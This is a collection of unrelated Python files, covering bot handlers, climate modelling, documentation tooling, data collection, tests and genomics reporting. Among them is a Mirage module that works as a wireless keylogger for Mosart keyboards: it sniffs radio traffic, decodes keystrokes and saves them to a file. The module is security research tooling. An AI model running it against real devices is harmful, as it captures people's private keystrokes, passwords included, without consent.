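    print(policy.to_dict().get("usb_port_front"))  # -> 'enabled'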
|
python
|
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Type, Union
from vkbottle import ABCView, BaseReturnManager
from vkbottle.dispatch.handlers import FromFuncHandler
from vkbottle.framework.bot import BotLabeler
from vkbottle.modules import logger
from vkbottle_types.events import MessageEvent as _MessageEvent
from vkbottle_callback.rules import *
from vkbottle_callback.types import MessageEvent
if TYPE_CHECKING:
from vkbottle import ABCAPI, ABCStateDispenser
from vkbottle.dispatch.rules import ABCRule
from vkbottle.dispatch.views import ABCView
from vkbottle.dispatch.views.bot import ABCBotMessageView, RawBotEventView
from vkbottle.framework.bot.labeler.abc import LabeledMessageHandler
class MessageEventReturnHandler(BaseReturnManager):
@BaseReturnManager.instance_of(str)
async def str_handler(self, value: str, event: MessageEvent, _: dict):
await event.show_snackbar(value)
def message_event_min(event: dict, ctx_api: "ABCAPI") -> "MessageEvent":
update = _MessageEvent(**event)
message_event = MessageEvent(
**update.object.dict(),
group_id=update.group_id,
)
setattr(message_event, "unprepared_ctx_api", ctx_api)
return message_event
class MessageEventView(ABCView):
def __init__(self):
super().__init__()
self.handler_return_manager = MessageEventReturnHandler()
async def process_event(self, event: dict) -> bool:
return event["type"] == "message_event"
async def handle_event(
self, event: dict, ctx_api: "ABCAPI", state_dispenser: "ABCStateDispenser"
) -> None:
logger.debug("Handling event ({}) with message_event view".format(event.get("event_id")))
context_variables: dict = {}
message_event = message_event_min(event, ctx_api)
message_event.state_peer = await state_dispenser.cast(message_event.peer_id)
mw_instances = await self.pre_middleware(message_event, context_variables) # type: ignore
if mw_instances is None:
logger.info("Handling stopped, pre_middleware returned error")
return
handle_responses = []
handlers = []
for handler in self.handlers:
result = await handler.filter(message_event) # type: ignore
logger.debug("Handler {} returned {}".format(handler, result))
if result is False:
continue
elif isinstance(result, dict):
context_variables.update(result)
handler_response = await handler.handle(message_event, **context_variables) # type: ignore
handle_responses.append(handler_response)
handlers.append(handler)
return_handler = self.handler_return_manager.get_handler(handler_response)
if return_handler is not None:
await return_handler(
self.handler_return_manager, handler_response, message_event, context_variables
)
if handler.blocking:
break
await self.post_middleware(mw_instances, handle_responses, handlers)
LabeledMessageEventHandler = Callable[..., Callable[[MessageEvent], Any]]
DEFAULT_CUSTOM_RULES: Dict[str, Type[ABCMessageEventRule]] = {
"from_chat": PeerRule,
"peer_ids": FromPeerRule,
"payload": PayloadRule,
"payload_contains": PayloadContainsRule,
"payload_map": PayloadMapRule,
"func": FuncRule,
"coro": CoroutineRule,
"coroutine": CoroutineRule,
"state": StateRule
}
class MessageEventLabeler(BotLabeler):
def __init__(
self,
message_view: Optional["ABCBotMessageView"] = None,
raw_event_view: Optional["RawBotEventView"] = None,
custom_rules: Optional[Dict[str, Type["ABCRule"]]] = None,
auto_rules: Optional[List["ABCRule"]] = None,
message_event_view: Optional["MessageEventView"] = None
):
super().__init__(message_view, raw_event_view, custom_rules, auto_rules)
self.custom_rules = custom_rules or DEFAULT_CUSTOM_RULES
self.message_event_view = message_event_view or MessageEventView()
def message_event(
self, *rules: "ABCRule", blocking: bool = True, **custom_rules
) -> "LabeledMessageHandler":
def decorator(func):
self.message_event_view.handlers.append(
FromFuncHandler(
func,
*rules,
*self.auto_rules,
*self.get_custom_rules(custom_rules),
blocking=blocking,
)
)
return func
return decorator
def load(self, labeler: Union[BotLabeler, "MessageEventLabeler"]):
if type(labeler) is MessageEventLabeler:
self.message_event_view.handlers.extend(labeler.message_event_view.handlers)
self.message_event_view.middlewares.update(labeler.message_event_view.middlewares)
self.message_view.handlers.extend(labeler.message_view.handlers)
self.message_view.middlewares.update(labeler.message_view.middlewares)
for event, handler_basements in labeler.raw_event_view.handlers.items():
event_handlers = self.raw_event_view.handlers.get(event)
if event_handlers:
event_handlers.extend(handler_basements)
else:
self.raw_event_view.handlers[event] = handler_basements
self.raw_event_view.middlewares.update(labeler.raw_event_view.middlewares)
def views(self) -> Dict[str, "ABCView"]:
return {
"message": self.message_view,
"message_event": self.message_event_view,
"raw": self.raw_event_view
}
__all__ = (
"MessageEventView",
"MessageEventLabeler"
)
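# Minimal usage sketch (illustration only): wiring MessageEventLabeler into a
# standard vkbottle Bot. The group token is a placeholder, so the run call is
# left commented out.
labeler_example = MessageEventLabeler()
@labeler_example.message_event(payload={"cmd": "ping"})
async def _ping_handler(event: MessageEvent):
    # A str return value is shown as a snackbar by MessageEventReturnHandler.
    return "pong"
# from vkbottle import Bot
# Bot(token="<group-token>", labeler=labeler_example).run_forever()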
|
python
|
from sympl import (
PlotFunctionMonitor, AdamsBashforth, NetCDFMonitor
)
from climt import SimplePhysics, get_default_state
import numpy as np
from datetime import timedelta
from climt import EmanuelConvection, RRTMGShortwave, RRTMGLongwave, SlabSurface
import matplotlib.pyplot as plt
def plot_function(fig, state):
ax = fig.add_subplot(2, 2, 1)
ax.plot(
state['air_temperature_tendency_from_convection'].to_units(
'degK day^-1').values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o')
ax.set_title('Conv. heating rate')
ax.set_xlabel('K/day')
ax.set_ylabel('millibar')
ax.grid()
ax.axes.invert_yaxis()
ax = fig.add_subplot(2, 2, 2)
ax.plot(
state['air_temperature'].values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o')
ax.set_title('Air temperature')
ax.axes.invert_yaxis()
ax.set_xlabel('K')
ax.grid()
ax = fig.add_subplot(2, 2, 3)
ax.plot(
state['air_temperature_tendency_from_longwave'].values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o',
label='LW')
ax.plot(
state['air_temperature_tendency_from_shortwave'].values.flatten(),
state['air_pressure'].to_units('mbar').values.flatten(), '-o',
label='SW')
ax.set_title('LW and SW Heating rates')
ax.legend()
ax.axes.invert_yaxis()
ax.set_xlabel('K/day')
ax.grid()
ax.set_ylabel('millibar')
ax = fig.add_subplot(2, 2, 4)
net_flux = (state['upwelling_longwave_flux_in_air'] +
state['upwelling_shortwave_flux_in_air'] -
state['downwelling_longwave_flux_in_air'] -
state['downwelling_shortwave_flux_in_air'])
ax.plot(
net_flux.values.flatten(),
state['air_pressure_on_interface_levels'].to_units(
'mbar').values.flatten(), '-o')
ax.set_title('Net Flux')
ax.axes.invert_yaxis()
ax.set_xlabel('W/m^2')
ax.grid()
plt.tight_layout()
monitor = PlotFunctionMonitor(plot_function)
timestep = timedelta(minutes=5)
convection = EmanuelConvection()
radiation_sw = RRTMGShortwave()
radiation_lw = RRTMGLongwave()
slab = SlabSurface()
simple_physics = SimplePhysics()
store_quantities = ['air_temperature',
'air_pressure',
'specific_humidity',
'air_pressure_on_interface_levels',
'air_temperature_tendency_from_convection',
'air_temperature_tendency_from_longwave',
'air_temperature_tendency_from_shortwave']
netcdf_monitor = NetCDFMonitor('rad_conv_eq.nc',
store_names=store_quantities,
write_on_store=True)
convection.current_time_step = timestep
state = get_default_state([simple_physics, convection,
radiation_lw, radiation_sw, slab])
state['air_temperature'].values[:] = 270
state['surface_albedo_for_direct_shortwave'].values[:] = 0.5
state['surface_albedo_for_direct_near_infrared'].values[:] = 0.5
state['surface_albedo_for_diffuse_shortwave'].values[:] = 0.5
state['zenith_angle'].values[:] = np.pi/2.5
state['surface_temperature'].values[:] = 300.
state['ocean_mixed_layer_thickness'].values[:] = 5
state['area_type'].values[:] = 'sea'
time_stepper = AdamsBashforth([convection, radiation_lw, radiation_sw, slab])
for i in range(20000):
convection.current_time_step = timestep
diagnostics, state = time_stepper(state, timestep)
state.update(diagnostics)
diagnostics, new_state = simple_physics(state, timestep)
state.update(diagnostics)
if (i+1) % 20 == 0:
monitor.store(state)
netcdf_monitor.store(state)
print(i, state['surface_temperature'].values)
print(state['surface_upward_sensible_heat_flux'])
print(state['surface_upward_latent_heat_flux'])
state.update(new_state)
state['time'] += timestep
state['eastward_wind'].values[:] = 3.
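# Inspecting the stored NetCDF output afterwards (illustration only; assumes
# xarray is installed):
#   import xarray as xr
#   ds = xr.open_dataset('rad_conv_eq.nc')
#   print(ds['air_temperature'])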
|
python
|
from threading import Thread
from .data_writer import DataWriter, DataWriterException, PlayerList
from pathlib import Path
from PIL import Image
class ScoredImageWriterException(DataWriterException):
pass
class WriteThread(Thread):
def __init__(self, scored_player_list: PlayerList,
save_dir_path: str):
super(WriteThread, self).__init__()
self.scored_player_list = scored_player_list
self.save_dir_path = Path(save_dir_path)
def run(self):
for scored_player in self.scored_player_list:
image = Image.open(scored_player.param)
image.save(
str(self.save_dir_path/f'{scored_player.score:0=3}.png'))
class ScoredImageWriter(DataWriter):
def __init__(self, save_dir_path: str):
self.save_dir_path = save_dir_path
if not Path(save_dir_path).is_dir():
            raise ScoredImageWriterException(
                f'{save_dir_path} is not a directory')
def write(self, scored_player_list: PlayerList):
write_thread = WriteThread(scored_player_list, self.save_dir_path)
write_thread.start()
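# Minimal usage sketch (illustration only). It assumes each entry of the
# PlayerList carries an image path in ``param`` and an integer ``score``, as
# WriteThread above expects; the directory is a placeholder.
#   writer = ScoredImageWriter('./scored_images')
#   writer.write(player_list)  # writes e.g. ./scored_images/042.png per player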
|
python
|
import numpy as np
from qtpy.QtCore import *
from qtpy.QtGui import *
from qtpy.QtWidgets import *
from xicam.core import msg
from xicam.core.data import load_header, NonDBHeader
from xicam.plugins import GUIPlugin, GUILayout, manager as pluginmanager
import pyqtgraph as pg
from functools import partial
from xicam.gui.widgets.dynimageview import DynImageView
from xicam.EFI import widgets
from xicam.gui.widgets.metadataview import MetadataView
from xicam.gui.widgets.tabview import TabView
# from .patches import pyqtgraph_export
# from .patches import pyqtgraph_tiffexporter
class EFIPlugin(GUIPlugin):
name = 'EFI'
sigLog = Signal(int, str, str, np.ndarray)
def __init__(self, *args, **kwargs):
# Data model
self.headermodel = QStandardItemModel()
self.toolbar = QToolBar()
# plot widget
self.reduceWidget = QWidget()
self.plot = pg.PlotWidget()
self.layout = QGridLayout()
self.reduceWidget.setLayout(self.layout)
self.layout.addWidget(self.plot)
x = np.random.random(20)
y = np.random.random(20)
self.plot.plot(x,y)
# table widget
self.tableWidget = QWidget()
self.table = QTableWidget()
self.layout2 = QGridLayout()
self.tableWidget.setLayout(self.layout2)
self.layout2.addWidget(self.table)
self.table.setRowCount(len(x))
self.table.setColumnCount(2)
for i in range(0,len(x)):
self.table.setItem(i,0,QTableWidgetItem(str(round(x[i],3))))
self.table.setItem(i,1,QTableWidgetItem(str(round(y[i],3))))
# Selection model
self.selectionmodel = QItemSelectionModel(self.headermodel)
# Setup TabViews
self.rawview = TabView(self.headermodel, self.selectionmodel, widgets.EFIViewerPlugin, 'primary')
self.reduceview = TabView(self.headermodel, self.selectionmodel, self.reduceWidget)
self.metadataview = MetadataView(self.headermodel, self.selectionmodel)
self.stages = {
'View': GUILayout(self.rawview, top=self.toolbar, right=self.metadataview),
'Reduce': GUILayout(self.reduceWidget, top=self.toolbar, right=self.tableWidget)
# 'View': GUILayout(QLabel('View'))
}
super(EFIPlugin, self).__init__(*args, **kwargs)
def appendHeader(self, header: NonDBHeader, **kwargs):
item = QStandardItem(header.startdoc.get('sample_name', '????'))
item.header = header
self.headermodel.appendRow(item)
self.headermodel.dataChanged.emit(QModelIndex(), QModelIndex())
|
python
|
from pathlib import Path
from slugify import slugify
from watchdog.events import RegexMatchingEventHandler
from kart.miners import DefaultMarkdownMiner
from kart.utils import KartDict
try:
from yaml import CSafeLoader as YamlLoader
except ImportError:
from yaml import SafeLoader as YamlLoader
import importlib
import inspect
import mistune
from jinja2 import contextfilter
from jinja2.runtime import Context
from mistune.directives import Directive
from kart.mappers import Mapper
from kart.markdown import KartMistuneRenderer, TocRenderer
from kart.utils import KartObserver
class DefaultDocumentationMiner(DefaultMarkdownMiner):
"""Miner that recursively looks for data in the ``docs`` folder"""
def __init__(self, directory: str = "docs"):
"Initializes miner. Sets the ``dir`` variable"
self.dir = Path(directory)
def __recursive_read_data(self, config: dict, dir: Path, level: int = 0):
"""Helper function"""
if dir.joinpath("navigation.yml").exists():
nav_file = dir.joinpath("navigation.yml").open()
nav_data = YamlLoader(nav_file.read()).get_data()
paths = []
for x in nav_data:
if "page" in x.keys():
paths.append(dir.joinpath(x["page"]))
elif "section" in x.keys():
paths.append(dir.joinpath(x["section"]))
else:
paths = dir.iterdir()
nav_data = []
for i, item in enumerate(paths):
if item.is_file():
object = self.collect_single_file(item, config)
slug, page = list(object.items())[0]
toc_entry = {"title": page["title"], "slug": slug, "level": level}
self.docs_global_toc.append(toc_entry)
if object:
self.markdown_data.update(object)
elif item.is_dir():
toc_entry = {"title": nav_data[i]["name"], "slug": None, "level": level}
self.docs_global_toc.append(toc_entry)
self.__recursive_read_data(config, item, level + 1)
def read_data(self, config: dict):
self.markdown_data = KartDict()
self.docs_global_toc = []
self.__recursive_read_data(config, self.dir)
def collect(self, config: dict):
return {"docs": self.markdown_data, "docs_global_toc": self.docs_global_toc}
def start_watching(self, config: dict, observer: KartObserver):
"""Registers a watchdog handler that calls read_data() when a file has changed"""
class Handler(RegexMatchingEventHandler):
def on_any_event(_, event):
                self.read_data(config)
self.read_data(config)
observer.schedule(Handler(), self.dir, recursive=True)
class DefaultDocumentationMapper(Mapper):
"""Mapper intended to be used with DefaultDocumentationMapper"""
def __init__(self, template: str = "page.html", base_url: str = ""):
self.template = template
self.base_url = base_url
def map(self, config: dict, site: KartDict) -> dict:
urls = {}
previous_slug = None
for slug, page in site["docs"].items():
if "url" in page:
url = page["url"]
elif slug == "index":
url = "/"
else:
url = "/" + "/".join(slugify(part) for part in slug.split(".")) + "/"
if "template" in page:
template = page["template"]
else:
template = self.template
if len(urls):
page["previous_page"] = previous_slug
urls[previous_slug]["data"]["next_page"] = slug
previous_slug = slug
map_page = {
"url": self.base_url + url,
"data": {**page},
"template": template,
"renderer": "default_site_renderer",
}
urls[slug] = map_page
return urls
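    # Example of the slug-to-URL scheme above: the slug "guide.getting-started"
    # maps to "/guide/getting-started/", while the special slug "index" maps
    # to "/".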
class DocumentationDirective(Directive):
"""Mistune class that add the ``function`` and ``class`` directive to build a techical documentation"""
def parse(self, block, m, state):
name = m.group("name")
title = m.group("value")
text = self.parse_text(m)
children = block.parse(text, state, block.rules)
return {"type": name, "children": children, "params": (name, title)}
def render_html_function(self, text, name, loc):
"""Renders the ``function`` directive"""
module_name = ".".join(loc.split(".")[:-1])
func_name = loc.split(".")[-1]
module = importlib.import_module(module_name)
module = importlib.reload(module)
func = module.__dict__[func_name]
sig = inspect.signature(func)
html = "<dl>"
html += f'<dt id="{loc}">function {loc}{sig}</dt>'
html += f"<dd><p>{func.__doc__}</p></dd>"
html += "</dl>"
return html
def render_html_class(self, text, name, loc):
"""Renders the ``class`` directive"""
module_name = ".".join(loc.split(".")[:-1])
func_name = loc.split(".")[-1]
module = importlib.import_module(module_name)
module = importlib.reload(module)
cls = module.__dict__[func_name]
parents = []
for p in cls.__bases__:
parents.append(p.__module__ + "." + p.__name__)
        html = '<dl class="class">'
html += f'<dt id="{loc}">class {loc}({", ".join(parents)})</dt>'
html += f"<dd><p>{cls.__doc__}</p></dd>"
functions = []
for x in inspect.getmembers(cls):
try:
if x[1].__module__ != module_name:
continue
if x[1].__qualname__.split(".")[0] != cls.__name__:
continue
except Exception:
continue
functions.append(cls.__dict__[x[0]])
if functions:
html += "<dl>"
for func in functions:
sig = inspect.signature(func)
if inspect.isabstract(cls) and func.__name__ in cls.__abstractmethods__:
html += "<dt>@abstractmethod</dt>"
html += f"<dt>{func.__name__}{sig}</dt>"
if inspect.getdoc(func):
html += f"<dd><p>{inspect.getdoc(func)}</p></dd>"
if functions:
html += "</dl>"
html += "</dl>"
return html
def render_ast(self, children, name, title=None):
return {"type": name, "children": children, "name": name, "title": title}
def __call__(self, md):
for name in {"function", "class"}:
self.register_directive(md, name)
if md.renderer.NAME == "ast":
md.renderer.register(name, self.render_ast)
if md.renderer.NAME == "html":
md.renderer.register("function", self.render_html_function)
md.renderer.register("class", self.render_html_class)
@contextfilter
def markdown_to_html(context: Context, markdown: str) -> str:
"""Converts markdown data to html.
It supports markdown directives to extract the documentation out of python
docstrings.
"""
return mistune.Markdown(
renderer=KartMistuneRenderer(context=context, escape=False),
plugins=[DocumentationDirective()],
)(markdown)
class DocumentationTocRenderer(TocRenderer):
"""Mistune renderer used by markdown_to_toc()"""
def __init__(self):
self._methods = {"class": self._class}
self.SUPPORTED_ELEMENTS = {"heading", "text", "class", "function"}
def function(self, _, type, name, **kwargs):
"""Renders the ``function`` directive"""
return {"title": name.split(".")[-1], "id": name, "level": 2}
def _class(self, _, type, name, **kwargs):
"""Renders the ``class`` directive"""
return {"title": name.split(".")[-1], "id": name, "level": 2}
def markdown_to_toc(markdown: str) -> str:
"""Extracts a list of header from markdown data"""
return mistune.Markdown(
renderer=DocumentationTocRenderer(),
plugins=[DocumentationDirective()],
)(markdown)
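# Minimal usage sketch (illustration only) for the helper above; the markdown
# text is a placeholder:
if __name__ == "__main__":
    sample_md = "# Overview\n\nSome text.\n"
    print(markdown_to_toc(sample_md))  # prints the extracted heading entries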
|
python
|
from flask import session
session['var'] = 'oi'
app.run()
app.secret_key = 'minha chave'  # goes in the main module; must be set before calling app.run()
# list of employees in the department
# department object on the employee
# insert an admin via the form (create a default admin with TRUE already set)
# list projects > view project details > (list of the project's employees)
# > checkboxes with the employees; select the employees you want to link
# > submit
# > view details > unlink/add
# > handle errors to check whether the link is already duplicated....
"""
@app.before_first_request
def before_first_request():
    print('ndsjkd')
@app.before_request
def before_request():
    print(request.path)
    print('jdklajskd')
# always executed, even when an exception is raised
@app.after_request
def after_request(response):
    print('jdklsa')
    return response
"""
|
python
|
from chalice import Chalice
import requests as rq
import boto3
import os
import json
from datetime import date, timedelta
NYCOD = os.environ.get('NYCOPENDATA', None)
BUCKET, KEY = 'philipp-packt', '311data'
resource = 'fhrw-4uyv'
time_col = 'Created Date'
def _upload_json(obj, filename, bucket, key):
S3 = boto3.client('s3', region_name='us-east-1')
key += ('/' + filename)
    S3.put_object(Bucket=bucket, Key=key, Body=json.dumps(obj))
def _get_data(resource, time_col, date, offset=0):
'''collect data from NYC open data
'''
Q = f"where=created_date between '{date:%Y-%m-%d}' AND '{date:%Y-%m-%d}T23:59:59.000'"
url = f'https://data.cityofnewyork.us/resource/{resource}.json?$limit=50000&$offset={offset}&${Q}'
headers = {"X-App-Token": NYCOD} if NYCOD else None
r = rq.get(url, headers=headers)
r.raise_for_status()
data = r.json()
if len(data) == 50_000:
offset2 = offset + 50000
data2 = _get_data(resource, time_col, date, offset=offset2)
data.extend(data2)
return data
app = Chalice(app_name='collect-311')
@app.schedule('rate(1 day)')
def get_data(event):
yesterday = date.today() - timedelta(days=1)
data = _get_data(resource, time_col, yesterday, offset=0)
_upload_json(data, f'{yesterday:%Y-%m-%d}.json', bucket=BUCKET, key=KEY)
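# Local smoke test (illustration only): fetch yesterday's records without
# deploying to AWS; the S3 upload step is deliberately skipped here.
if __name__ == "__main__":
    yesterday = date.today() - timedelta(days=1)
    records = _get_data(resource, time_col, yesterday)
    print(f'{len(records)} records for {yesterday:%Y-%m-%d}')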
|
python
|
from django.shortcuts import render, get_object_or_404
from django.views.generic import (DetailView, UpdateView)
from django.contrib.auth.mixins import (LoginRequiredMixin,
PermissionRequiredMixin)
from .models import Company
class CompanyDetailView(LoginRequiredMixin, DetailView):
"""Detalle de una empresa."""
model = Company
def get_object(self, queryset=None):
return get_object_or_404(self.model, pk=self.kwargs.get("company"))
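# Hypothetical urls.py wiring (illustration only). get_object() above reads
# the pk from self.kwargs["company"], so the URL kwarg must be named "company":
#   from django.urls import path
#   from .views import CompanyDetailView
#   urlpatterns = [
#       path("companies/<int:company>/", CompanyDetailView.as_view(),
#            name="company-detail"),
#   ]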
|
python
|
import numpy as np
from skimage._shared import testing
from skimage._shared.testing import assert_equal
from skimage.util._label import label_points
def test_label_points_coords_dimension():
coords, output_shape = np.array([[1, 2], [3, 4]]), (5, 5, 2)
with testing.raises(ValueError):
label_points(coords, output_shape)
def test_label_points_coords_range():
coords, output_shape = np.array([[0, 0],
[5, 5]]), (5, 5)
with testing.raises(IndexError):
label_points(coords, output_shape)
def test_label_points_coords_negative():
coords, output_shape = np.array([[-1, 0],
[5, 5]]), (5, 5)
with testing.raises(ValueError):
label_points(coords, output_shape)
def test_label_points_two_dimensional_output():
coords, output_shape = np.array([[0, 0],
[1, 1],
[2, 2],
[3, 3],
[4, 4]]), (5, 5)
mask = label_points(coords, output_shape)
assert_equal(mask, np.array([[1, 0, 0, 0, 0],
[0, 2, 0, 0, 0],
[0, 0, 3, 0, 0],
[0, 0, 0, 4, 0],
[0, 0, 0, 0, 5]]))
def test_label_points_multi_dimensional_output():
coords, output_shape = np.array([[0, 0, 0],
[1, 1, 1],
[2, 2, 2],
[3, 3, 0],
[4, 4, 1]]), (5, 5, 3)
mask = label_points(coords, output_shape)
result = np.array([
[
[1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 2, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 0, 0], [0, 0, 3], [0, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 0, 0], [0, 0, 0], [4, 0, 0], [0, 0, 0]
],
[
[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 5, 0]
]
])
assert_equal(mask, result)
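# A minimal reference sketch of the behaviour the tests above expect (not the
# skimage implementation): coordinate i (0-based) is labelled i + 1 in an
# otherwise zero integer mask.
def _label_points_reference(coords, output_shape):
    coords = np.asarray(coords)
    if coords.shape[1] != len(output_shape):
        raise ValueError("coordinate dimension must match output_shape")
    if (coords < 0).any():
        raise ValueError("coordinates must be non-negative")
    if (coords >= np.asarray(output_shape)).any():
        raise IndexError("coordinates must lie inside output_shape")
    mask = np.zeros(output_shape, dtype=np.int64)
    mask[tuple(coords.T)] = np.arange(1, len(coords) + 1)
    return mask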
|
python
|
from mirage.libs import mosart,utils,io
from mirage.libs.common.hid import HIDMapping
from mirage.core import module
class mosart_keylogger(module.WirelessModule):
def init(self):
self.technology = "mosart"
self.type = "attack"
self.description = "Keystrokes logger module for Mosart keyboard"
self.args = {
"INTERFACE":"rfstorm0",
"TARGET":"",
"CHANNEL":"36",
"LOCALE":"fr",
"TIME":"",
"TEXT_FILE":""
}
self.lastKey = None
self.text = ""
def checkSniffingCapabilities(self):
return self.receiver.hasCapabilities("SNIFFING_NORMAL")
def show(self,pkt):
if pkt.state == "pressed":
key = HIDMapping(locale=self.args["LOCALE"].lower()).getKeyFromHIDCode(pkt.hidCode,pkt.modifiers)
if key is not None:
if key != self.lastKey:
io.info(key)
self.text += key if len(key) == 1 else " ["+key+"] "
self.lastKey = key
else:
io.fail("Unknown HID code and modifiers: hidCode = "+str(pkt.hidCode)+" | modifiers = "+str(pkt.modifiers))
elif pkt.state == "released":
self.lastKey = None
def exportTextFile(self):
io.info("Captured keystrokes: "+self.text)
if self.args["TEXT_FILE"] != "":
with open(self.args["TEXT_FILE"],"w") as f:
io.success("Captured keystrokes stored as "+self.args["TEXT_FILE"])
f.write(self.text)
f.close()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.receiver.enterSnifferMode(utils.addressArg(self.args["TARGET"]))
if self.checkSniffingCapabilities():
self.receiver.onEvent("MosartKeyboardKeystrokePacket",callback=self.show)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
try:
time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
                while (utils.now() - start <= time) if time is not None else True:
utils.wait(seconds=0.5)
except KeyboardInterrupt:
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to run in sniffing mode.")
return self.nok()
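# Typical invocation from the Mirage command line (illustration only; the
# target address and output path are placeholders):
#   mirage mosart_keylogger INTERFACE=rfstorm0 TARGET=11:22:33:44 \
#       CHANNEL=36 LOCALE=fr TEXT_FILE=/tmp/keystrokes.txt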
|
python
|
import torch
from PIL import Image
import matplotlib.pyplot as plt
from torchvision import transforms
# Set up the matplotlib figure
f, axes = plt.subplots(1, 2, figsize=(7, 7), sharex=True)
# Load the synthetic snowy image, the snow mask, and the ground-truth image
img_data = Image.open("../data/Test/Snow100K-L/synthetic/beautiful_smile_00003.jpg").convert('RGB')
mask_data = Image.open("../data/Test/Snow100K-L/mask/beautiful_smile_00003.jpg").convert('L')
gt_data = Image.open("../data/Test/Snow100K-L/gt/beautiful_smile_00003.jpg").convert('RGB')
toTensor = transforms.ToTensor()
img_tensor = toTensor(img_data).to(device='cuda:0')
mask_tensor = toTensor(mask_data).to(device='cuda:0')
gt_tensor = toTensor(gt_data).to(device='cuda:0')
img_index = (mask_tensor>0).repeat(3,1,1)
with torch.no_grad():
a_gt = (img_tensor - (1 - mask_tensor) * gt_tensor)/(1e-8 + mask_tensor) * (mask_tensor != 0)
za = img_tensor - (1 - mask_tensor) * gt_tensor
a_gt = a_gt.cpu().numpy().reshape(a_gt.shape[0]*a_gt.shape[1]*a_gt.shape[2])
za = za.cpu().numpy().reshape(za.shape[0]*za.shape[1]*za.shape[2])
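# Derivation behind the two quantities above (added note, not from the
# original script): the snowy image is modelled as
#     img = (1 - mask) * gt + mask * a
# so the snow layer is recovered as
#     a_gt = (img - (1 - mask) * gt) / mask    (1e-8 guards against mask == 0)
# while za = img - (1 - mask) * gt = mask * a is the unnormalised snow residue.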
num_bins = 30
plt.subplot(1,2,1)
plt.hist(a_gt, bins=num_bins, color="r", log=True)
plt.title('(a)', y=-0.10)
plt.subplot(1,2,2)
plt.hist(za, bins=num_bins, color="b", log=True)
plt.title('(b)', y=-0.10)
plt.tight_layout()
plt.show()
|
python
|
#!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import combinetargets, filer, GenObject, MetadataObject, \
make_path, run_subprocess, write_to_logfile
from olctools.accessoryFunctions.metadataprinter import MetadataPrinter
from genemethods.typingclasses.resistance import ResistanceNotes
from genemethods.assemblypipeline.GeneSeekr import GeneSeekr
from genemethods.sipprCommon.objectprep import Objectprep
from genemethods.sipprCommon.sippingmethods import Sippr
from genemethods.genesippr.genesippr import GeneSippr
from genemethods.serosippr.serosippr import SeroSippr
from genemethods.sipprCommon.kma_wrapper import KMA
from genemethods.geneseekr.blast import BLAST
from Bio.Seq import Seq
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from glob import glob
import xlsxwriter
import threading
import logging
import pandas
import shutil
import os
import re
__author__ = 'adamkoziol'
class GDCS(object):
def main(self):
"""
Run the necessary methods in the correct order
"""
if not os.path.isfile(self.gdcs_report):
logging.info('Starting {at} analysis pipeline'.format(at=self.analysistype))
# Extract the number of core genes found out of the total number of core genes for that genus.
self.gene_tally()
# Create the reports
self.reporter()
else:
self.report_parse()
def gene_tally(self):
"""
Tally the number of core genes present out of the total number of expected core genes for MLST, rMLST, and
cgMLST analyses
"""
for sample in self.runmetadata.samples:
genes_present = 0
genes_total = 0
# Create the GenObject with the necessary attributes
setattr(sample, self.analysistype, GenObject())
for analysistype in self.analyses:
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] = 0
sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)] = 0
try:
# Add the total number of genes in the database of the current analysis type
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] \
+= len(sample[analysistype].combined_metadata_results)
sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)] \
+= len(sample[analysistype].combined_metadata_results)
                    # A gene can appear multiple times in the mismatchestosequencetype
                    # attribute; only count each gene once
counted_genes = list()
# Subtract genes that are not present in the strain
for mismatch in sample[analysistype].mismatchestosequencetype:
for gene, allele in mismatch.items():
if gene not in counted_genes:
counted_genes.append(gene)
# If the gene is not present in the strain, and the profile, subtract the gene from
# both the genes present and genes total
if allele == 'NA (N)':
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] -= 1
sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)] -= 1
# If the gene is missing in the strain, but present in the profile, only subtract
# the gene from the genes present
elif 'NA (' in allele:
sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)] -= 1
except AttributeError:
pass
# Add the MLST and rMLST genes to the running totals
if analysistype != 'cgmlst':
# Increment the genes present and total variables with the results from the current analysis
genes_present += sample[self.analysistype]['{at}_genes_present'.format(at=analysistype)]
genes_total += sample[self.analysistype]['{at}_genes_total'.format(at=analysistype)]
# Calculate the total core results
sample[self.analysistype].coreresults = '{pres}/{total}'.format(pres=genes_present,
total=genes_total)
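    # Worked example: with 7/7 MLST genes and 53/53 rMLST genes present,
    # coreresults is '60/60'. cgMLST counts are tallied per analysis type but
    # deliberately excluded from this combined total.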
def reporter(self):
"""
Create a report of the core genes present / total genes for each strain
"""
data = 'Strain,Genus,TotalCore,MLST_genes,rMLST_genes,cgMLST_genes,\n'
for sample in self.runmetadata.samples:
# Extract the closest reference genus
try:
genus = sample.general.closestrefseqgenus
except AttributeError:
try:
genus = sample.general.referencegenus
except AttributeError:
genus = 'ND'
data += '{sn},{genus},{total},'.format(sn=sample.name,
genus=genus,
total=sample[self.analysistype].coreresults)
for analysis in self.analyses:
data += '{present}/{total},'.format(present=sample[self.analysistype]['{at}_genes_present'
.format(at=analysis)],
total=sample[self.analysistype]['{at}_genes_total'
.format(at=analysis)])
data += '\n'
with open(self.gdcs_report, 'w') as report:
report.write(data)
def report_parse(self):
"""
Parse an existing GDCS report, and extract the results
"""
nesteddictionary = dict()
# Use pandas to read in the CSV file, and convert the pandas data frame to a dictionary (.to_dict())
